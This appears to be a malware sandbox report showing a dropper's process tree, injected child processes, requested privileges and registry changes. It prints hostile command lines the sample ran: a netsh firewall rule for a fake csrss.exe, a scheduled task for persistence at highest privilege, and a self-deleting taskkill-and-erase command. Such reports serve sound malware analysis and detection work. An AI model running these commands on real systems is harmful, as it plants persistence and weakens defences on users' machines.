Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
1676	pub2.exe
1676	pub2.exe
3696	jfiag3g_gg.exe
3696	jfiag3g_gg.exe
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688
688

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1676 pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	1420	SoCleanInst.exe
Token: SeCreateTokenPrivilege	1208	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1208	Install.exe
Token: SeLockMemoryPrivilege	1208	Install.exe
Token: SeIncreaseQuotaPrivilege	1208	Install.exe
Token: SeMachineAccountPrivilege	1208	Install.exe
Token: SeTcbPrivilege	1208	Install.exe
Token: SeSecurityPrivilege	1208	Install.exe
Token: SeTakeOwnershipPrivilege	1208	Install.exe
Token: SeLoadDriverPrivilege	1208	Install.exe
Token: SeSystemProfilePrivilege	1208	Install.exe
Token: SeSystemtimePrivilege	1208	Install.exe
Token: SeProfSingleProcessPrivilege	1208	Install.exe
Token: SeIncBasePriorityPrivilege	1208	Install.exe
Token: SeCreatePagefilePrivilege	1208	Install.exe
Token: SeCreatePermanentPrivilege	1208	Install.exe
Token: SeBackupPrivilege	1208	Install.exe
Token: SeRestorePrivilege	1208	Install.exe
Token: SeShutdownPrivilege	1208	Install.exe
Token: SeDebugPrivilege	1208	Install.exe
Token: SeAuditPrivilege	1208	Install.exe
Token: SeSystemEnvironmentPrivilege	1208	Install.exe
Token: SeChangeNotifyPrivilege	1208	Install.exe
Token: SeRemoteShutdownPrivilege	1208	Install.exe
Token: SeUndockPrivilege	1208	Install.exe
Token: SeSyncAgentPrivilege	1208	Install.exe
Token: SeEnableDelegationPrivilege	1208	Install.exe
Token: SeManageVolumePrivilege	1208	Install.exe
Token: SeImpersonatePrivilege	1208	Install.exe
Token: SeCreateGlobalPrivilege	1208	Install.exe
Token: 31	1208	Install.exe
Token: 32	1208	Install.exe
Token: 33	1208	Install.exe
Token: 34	1208	Install.exe
Token: 35	1208	Install.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeManageVolumePrivilege	2836	md9_1sjm.exe
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688
Token: SeCreatePagefilePrivilege	688
Token: SeShutdownPrivilege	688

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

tevoY1KiB43L3jCIdZQ5ajbt.exexNhQTlVNHSkmLF7GCZkFJiTd.exeHOKnoPFdltTtIbOUvX6L1Ept.exegCDsyXILUpUfXemHUvJEr0TO.exeYRVbTmCQMqPXQ19Ies9fEBwl.exexj5UBk4j3LIjsMCYOaFbMa8b.exe8sS1hp2i03Ah5WkY3UjDU_zx.exerU5pGOi7qyJAO8IGAKODku_I.exeyuV8JaQkflxpgPaEr5wmHrHU.exe6g5pAeGh5k6bIJzlKBftWfIV.exee7rUYYQ6omMv05JKEC1mSxA4.exe585WZ5oegGODOHtxXkp4vulx.exe

pid	process
2584	tevoY1KiB43L3jCIdZQ5ajbt.exe
524	xNhQTlVNHSkmLF7GCZkFJiTd.exe
4048	HOKnoPFdltTtIbOUvX6L1Ept.exe
428	gCDsyXILUpUfXemHUvJEr0TO.exe
3108	YRVbTmCQMqPXQ19Ies9fEBwl.exe
2724	xj5UBk4j3LIjsMCYOaFbMa8b.exe
2108	8sS1hp2i03Ah5WkY3UjDU_zx.exe
4024	rU5pGOi7qyJAO8IGAKODku_I.exe
3828	yuV8JaQkflxpgPaEr5wmHrHU.exe
2584	tevoY1KiB43L3jCIdZQ5ajbt.exe
4912	6g5pAeGh5k6bIJzlKBftWfIV.exe
1508	e7rUYYQ6omMv05JKEC1mSxA4.exe
1288	585WZ5oegGODOHtxXkp4vulx.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exeFolder.exerUNdlL32.eXeFiles.exeInstall.execmd.exesvchost.exeInfo.execmd.exeFile.exe

description	pid	process	target process
PID 4692 wrote to memory of 1420	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	SoCleanInst.exe
PID 4692 wrote to memory of 1420	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	SoCleanInst.exe
PID 4692 wrote to memory of 2836	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	md9_1sjm.exe
PID 4692 wrote to memory of 2836	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	md9_1sjm.exe
PID 4692 wrote to memory of 2836	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	md9_1sjm.exe
PID 4692 wrote to memory of 3820	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Folder.exe
PID 4692 wrote to memory of 3820	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Folder.exe
PID 4692 wrote to memory of 3820	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Folder.exe
PID 4692 wrote to memory of 3656	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Info.exe
PID 4692 wrote to memory of 3656	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Info.exe
PID 4692 wrote to memory of 3656	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Info.exe
PID 4692 wrote to memory of 3760	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Updbdate.exe
PID 4692 wrote to memory of 3760	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Updbdate.exe
PID 4692 wrote to memory of 3760	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Updbdate.exe
PID 4692 wrote to memory of 3436	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	File.exe
PID 4692 wrote to memory of 3436	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	File.exe
PID 4692 wrote to memory of 3436	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	File.exe
PID 3820 wrote to memory of 228	3820	Folder.exe	Folder.exe
PID 3820 wrote to memory of 228	3820	Folder.exe	Folder.exe
PID 3820 wrote to memory of 228	3820	Folder.exe	Folder.exe
PID 4692 wrote to memory of 1208	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Install.exe
PID 4692 wrote to memory of 1208	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Install.exe
PID 4692 wrote to memory of 1208	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Install.exe
PID 4692 wrote to memory of 1676	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	pub2.exe
PID 4692 wrote to memory of 1676	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	pub2.exe
PID 4692 wrote to memory of 1676	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	pub2.exe
PID 4692 wrote to memory of 1536	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Files.exe
PID 4692 wrote to memory of 1536	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Files.exe
PID 4692 wrote to memory of 1536	4692	809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe	Files.exe
PID 4816 wrote to memory of 2940	4816	rUNdlL32.eXe	rundll32.exe
PID 4816 wrote to memory of 2940	4816	rUNdlL32.eXe	rundll32.exe
PID 4816 wrote to memory of 2940	4816	rUNdlL32.eXe	rundll32.exe
PID 1536 wrote to memory of 3988	1536	Files.exe	jfiag3g_gg.exe
PID 1536 wrote to memory of 3988	1536	Files.exe	jfiag3g_gg.exe
PID 1536 wrote to memory of 3988	1536	Files.exe	jfiag3g_gg.exe
PID 1208 wrote to memory of 3620	1208	Install.exe	cmd.exe
PID 1208 wrote to memory of 3620	1208	Install.exe	cmd.exe
PID 1208 wrote to memory of 3620	1208	Install.exe	cmd.exe
PID 3620 wrote to memory of 4060	3620	cmd.exe	taskkill.exe
PID 3620 wrote to memory of 4060	3620	cmd.exe	taskkill.exe
PID 3620 wrote to memory of 4060	3620	cmd.exe	taskkill.exe
PID 1536 wrote to memory of 3696	1536	Files.exe	jfiag3g_gg.exe
PID 1536 wrote to memory of 3696	1536	Files.exe	jfiag3g_gg.exe
PID 1536 wrote to memory of 3696	1536	Files.exe	jfiag3g_gg.exe
PID 3660 wrote to memory of 4436	3660	svchost.exe	Info.exe
PID 3660 wrote to memory of 4436	3660	svchost.exe	Info.exe
PID 3660 wrote to memory of 4436	3660	svchost.exe	Info.exe
PID 4436 wrote to memory of 3048	4436	Info.exe	cmd.exe
PID 4436 wrote to memory of 3048	4436	Info.exe	cmd.exe
PID 3048 wrote to memory of 2032	3048	cmd.exe	netsh.exe
PID 3048 wrote to memory of 2032	3048	cmd.exe	netsh.exe
PID 4436 wrote to memory of 1232	4436	Info.exe	csrss.exe
PID 4436 wrote to memory of 1232	4436	Info.exe	csrss.exe
PID 4436 wrote to memory of 1232	4436	Info.exe	csrss.exe
PID 3436 wrote to memory of 2196	3436	File.exe	zKokun_jEHemVAAsWgW_pab3.exe
PID 3436 wrote to memory of 2196	3436	File.exe	zKokun_jEHemVAAsWgW_pab3.exe
PID 3436 wrote to memory of 2584	3436	File.exe	tevoY1KiB43L3jCIdZQ5ajbt.exe
PID 3436 wrote to memory of 2584	3436	File.exe	tevoY1KiB43L3jCIdZQ5ajbt.exe
PID 3436 wrote to memory of 2584	3436	File.exe	tevoY1KiB43L3jCIdZQ5ajbt.exe
PID 3436 wrote to memory of 4048	3436	File.exe	HOKnoPFdltTtIbOUvX6L1Ept.exe
PID 3436 wrote to memory of 4048	3436	File.exe	HOKnoPFdltTtIbOUvX6L1Ept.exe
PID 3436 wrote to memory of 4048	3436	File.exe	HOKnoPFdltTtIbOUvX6L1Ept.exe
PID 3436 wrote to memory of 3108	3436	File.exe	YRVbTmCQMqPXQ19Ies9fEBwl.exe
PID 3436 wrote to memory of 3108	3436	File.exe	YRVbTmCQMqPXQ19Ies9fEBwl.exe

C:\Users\Admin\AppData\Local\Temp\809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe
"C:\Users\Admin\AppData\Local\Temp\809dddfa880fd14713fe7f77cb9fcbb54f750b52fb799a7e19cf1fb6410f051b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4692

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3820

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:228

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 368
3⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 372
3⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 372
3⤵
- Program crash
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 616
3⤵
- Program crash
PID:1352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 704
3⤵
- Program crash
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 724
3⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 704
3⤵
- Program crash
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 752
3⤵
- Program crash
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 772
3⤵
- Program crash
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 792
3⤵
- Program crash
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 800
3⤵
- Program crash
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 828
3⤵
- Program crash
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 736
3⤵
- Program crash
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 892
3⤵
- Program crash
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 604
3⤵
- Program crash
PID:3764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 956
3⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 968
3⤵
- Program crash
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 936
3⤵
- Program crash
PID:2724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 988
3⤵
- Program crash
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 836
3⤵
- Program crash
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 736
3⤵
- Program crash
PID:3196

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 324
4⤵
- Program crash
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 328
4⤵
- Program crash
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 328
4⤵
- Program crash
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 632
4⤵
- Program crash
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 680
4⤵
- Program crash
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 700
4⤵
- Program crash
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 700
4⤵
- Program crash
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 632
4⤵
- Program crash
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 644
4⤵
- Program crash
PID:3212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 836
4⤵
- Program crash
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 712
4⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 816
4⤵
- Program crash
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 572
4⤵
- Program crash
PID:1632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 816
4⤵
- Program crash
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 572
4⤵
- Program crash
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 576
4⤵
- Program crash
PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:2032

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 220
5⤵
- Program crash
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 228
5⤵
- Program crash
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 388
5⤵
- Program crash
PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 652
5⤵
- Program crash
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 652
5⤵
- Program crash
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 652
5⤵
- Program crash
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 652
5⤵
- Program crash
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 728
5⤵
- Program crash
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 756
5⤵
- Program crash
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 616
5⤵
- Program crash
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 668
5⤵
- Program crash
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 724
5⤵
- Program crash
PID:1152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 724
5⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 908
5⤵
PID:5724

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 924
5⤵
PID:6064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 996
5⤵
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 984
5⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3436

C:\Users\Admin\Pictures\Adobe Films\zKokun_jEHemVAAsWgW_pab3.exe
"C:\Users\Admin\Pictures\Adobe Films\zKokun_jEHemVAAsWgW_pab3.exe"
3⤵
- Executes dropped EXE
PID:2196

C:\Users\Admin\Pictures\Adobe Films\tevoY1KiB43L3jCIdZQ5ajbt.exe
"C:\Users\Admin\Pictures\Adobe Films\tevoY1KiB43L3jCIdZQ5ajbt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pV9261DEfb.bat"
4⤵
PID:1240

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
5⤵
PID:3128

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:5460

C:\Users\Admin\Pictures\Adobe Films\tevoY1KiB43L3jCIdZQ5ajbt.exe
"C:\Users\Admin\Pictures\Adobe Films\tevoY1KiB43L3jCIdZQ5ajbt.exe"
5⤵
PID:3540

C:\Users\Admin\Pictures\Adobe Films\gCDsyXILUpUfXemHUvJEr0TO.exe
"C:\Users\Admin\Pictures\Adobe Films\gCDsyXILUpUfXemHUvJEr0TO.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 624
4⤵
- Program crash
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 660
4⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 640
4⤵
- Program crash
PID:5864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 672
4⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 640
4⤵
- Program crash
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 1224
4⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 1260
4⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gCDsyXILUpUfXemHUvJEr0TO.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\gCDsyXILUpUfXemHUvJEr0TO.exe" & exit
4⤵
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 1124
4⤵
PID:3952

C:\Users\Admin\Pictures\Adobe Films\qYCp5CH0TTpX7dJ6esjqeeHu.exe
"C:\Users\Admin\Pictures\Adobe Films\qYCp5CH0TTpX7dJ6esjqeeHu.exe"
3⤵
- Executes dropped EXE
PID:4400

C:\Users\Admin\AppData\Local\Temp\80984cc1-a701-4f9d-b62b-56e8d730a441.exe
"C:\Users\Admin\AppData\Local\Temp\80984cc1-a701-4f9d-b62b-56e8d730a441.exe"
4⤵
PID:5172

C:\Users\Admin\Pictures\Adobe Films\8sS1hp2i03Ah5WkY3UjDU_zx.exe
"C:\Users\Admin\Pictures\Adobe Films\8sS1hp2i03Ah5WkY3UjDU_zx.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2108

C:\Users\Admin\Pictures\Adobe Films\8sS1hp2i03Ah5WkY3UjDU_zx.exe
"C:\Users\Admin\Pictures\Adobe Films\8sS1hp2i03Ah5WkY3UjDU_zx.exe"
4⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 564
5⤵
- Program crash
PID:5760

C:\Users\Admin\Pictures\Adobe Films\4A9b8IJJcbjsBArYqp1xNyoO.exe
"C:\Users\Admin\Pictures\Adobe Films\4A9b8IJJcbjsBArYqp1xNyoO.exe"
3⤵
- Executes dropped EXE
PID:4932

C:\Users\Admin\Pictures\Adobe Films\Ew4_GcQMa47V7r87EU62idmh.exe
"C:\Users\Admin\Pictures\Adobe Films\Ew4_GcQMa47V7r87EU62idmh.exe"
3⤵
- Executes dropped EXE
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:4696

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:6124

C:\Users\Admin\Pictures\Adobe Films\xj5UBk4j3LIjsMCYOaFbMa8b.exe
"C:\Users\Admin\Pictures\Adobe Films\xj5UBk4j3LIjsMCYOaFbMa8b.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2724

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 608
4⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 948
4⤵
PID:1568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 872
4⤵
PID:5888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 940
4⤵
PID:4224

C:\Users\Admin\Pictures\Adobe Films\6g5pAeGh5k6bIJzlKBftWfIV.exe
"C:\Users\Admin\Pictures\Adobe Films\6g5pAeGh5k6bIJzlKBftWfIV.exe"
3⤵
- Executes dropped EXE
